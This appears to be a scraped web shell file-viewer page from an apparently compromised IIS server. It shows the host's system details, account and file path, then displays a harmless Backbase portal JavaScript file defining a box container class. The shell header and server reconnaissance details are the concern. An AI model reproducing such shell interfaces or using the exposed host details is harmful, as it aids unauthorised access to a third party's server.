HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/PHerau/ha.health-science.be/wwwroot/Icons/Zx/-/box.js.download
/*global b$, window */
(function () {
    'use strict';

    var Container = b$.bdom.getNamespace('http://backbase.com/2013/portalView').getClass('container');

    Container.extend(function (bdomDocument, node) {
        Container.apply(this, arguments);
        this.isPossibleDragTarget = true;
    }, {
        localName: 'SimpleBoxContainer',
        namespaceURI: 'universal'
    }, {
        template: function(json) {
            var data = {item: json.model.originalItem};
            return window['templates_' + this.localName][this.localName](data);
        },
        handlers: {
            'preferences-form': function () { },
            preferencesSaved: function () {
                this.refreshHTML();
            }
        }
    });
})();